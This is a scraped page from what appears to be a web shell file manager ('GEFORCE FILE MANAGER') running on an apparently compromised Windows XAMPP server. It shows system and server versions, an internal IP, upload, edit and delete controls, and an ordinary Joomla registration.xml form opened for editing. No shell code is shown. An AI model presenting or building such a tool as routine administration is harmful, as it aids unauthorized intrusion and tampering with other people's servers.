[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
components
/
com_users
/
forms
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 frontend.xml
794 B
SET
[ EDIT ]
|
[ DEL ]
📄 login.xml
616 B
SET
[ EDIT ]
|
[ DEL ]
📄 profile.xml
1,307 B
SET
[ EDIT ]
|
[ DEL ]
📄 registration.xml
1,658 B
SET
[ EDIT ]
|
[ DEL ]
📄 remind.xml
409 B
SET
[ EDIT ]
|
[ DEL ]
📄 reset_confirm.xml
438 B
SET
[ EDIT ]
|
[ DEL ]
📄 sitelang.xml
341 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: registration.xml
<?xml version="1.0" encoding="UTF-8"?> <form> <fieldset name="default" label="COM_USERS_REGISTRATION_DEFAULT_LABEL"> <field name="spacer" type="spacer" label="COM_USERS_REGISTER_REQUIRED" class="text" /> <field name="name" type="text" label="COM_USERS_REGISTER_NAME_LABEL" filter="string" required="true" size="30" /> <field name="username" type="text" label="COM_USERS_REGISTER_USERNAME_LABEL" class="validate-username" filter="username" message="COM_USERS_REGISTER_USERNAME_MESSAGE" required="true" size="30" validate="username" autocomplete="username" /> <field name="password1" type="password" label="COM_USERS_PROFILE_PASSWORD1_LABEL" required="true" autocomplete="new-password" class="validate-password" field="password1" size="30" validate="password" strengthmeter="true" rules="true" force="on" filter="raw" /> <field name="password2" type="password" label="COM_USERS_PROFILE_PASSWORD2_LABEL" autocomplete="new-password" class="validate-password" field="password1" filter="raw" message="COM_USERS_PROFILE_PASSWORD1_MESSAGE" size="30" validate="equals" required="true" /> <field name="email1" type="email" label="COM_USERS_REGISTER_EMAIL1_LABEL" field="id" filter="string" required="true" size="30" unique="true" validate="email" validDomains="com_users.domains" autocomplete="email" /> </fieldset> <fieldset name="captcha"> <field name="captcha" type="captcha" label="COM_USERS_CAPTCHA_LABEL" validate="captcha" /> </fieldset> </form>